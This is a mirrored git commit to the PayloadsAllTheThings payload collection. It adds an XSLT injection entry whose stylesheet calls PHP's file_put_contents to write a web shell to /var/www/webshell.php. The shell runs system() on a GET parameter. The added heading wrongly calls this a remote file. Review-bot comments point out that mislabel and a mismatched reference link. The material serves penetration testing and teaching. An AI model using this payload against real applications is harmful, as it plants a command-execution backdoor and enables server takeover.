mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #690 from idealphase/master
Update README.md (XSLT Injection)
commit
85871c6c14
@ -161,6 +161,16 @@ Execute a PHP meterpreter using PHP wrapper.
|
|||||||
</xsl:stylesheet>
|
</xsl:stylesheet>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute a remote php file using `file_put_contents`
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
|
||||||
|
<xsl:template match="/">
|
||||||
|
<xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','<?php echo system($_GET["command"]); ?>')" />
|
||||||
|
</xsl:template>
|
||||||
|
</xsl:stylesheet>
|
||||||
|
```
|
||||||
|
|
||||||
### Remote Code Execution with Java
|
### Remote Code Execution with Java
|
||||||
|
|
||||||
```xml
|
```xml
|
||||||
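Review bot: The heading added above the new block, "Execute a remote php file using `file_put_contents`", does not match what the stylesheet does. The `php:function('file_put_contents', ...)` call writes an inline string to the local path `/var/www/webshell.php`; nothing remote is fetched or executed. Retitle the entry to say that it writes a PHP file to disk. The entry also gives no precondition: add one sentence stating that it depends on the `php:` extension namespace (`xmlns:php="http://php.net/xsl"`) being callable from the stylesheet, so that someone reviewing an application knows which processor setting to look for and turn off.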
@ -214,4 +224,4 @@ Execute a PHP meterpreter using PHP wrapper.
|
|||||||
|
|
||||||
* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
|
* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
|
||||||
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
||||||
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
|
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
|
||||||
|
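Review bot: In the references list touched by this hunk, the last entry's label "XSLT Injection Basics - Saxon" does not match its target: the URL is a blog.hunniccyber.com post whose slug reads `ektron-cms-remote-code-execution-xslt-transform-injection-java`. Use the linked post's own title as the link text. For consistency with the first entry, which carries a date and author ("02 July 2012 - @agarri"), the Fortify and hunniccyber entries should follow the same title, date, author pattern.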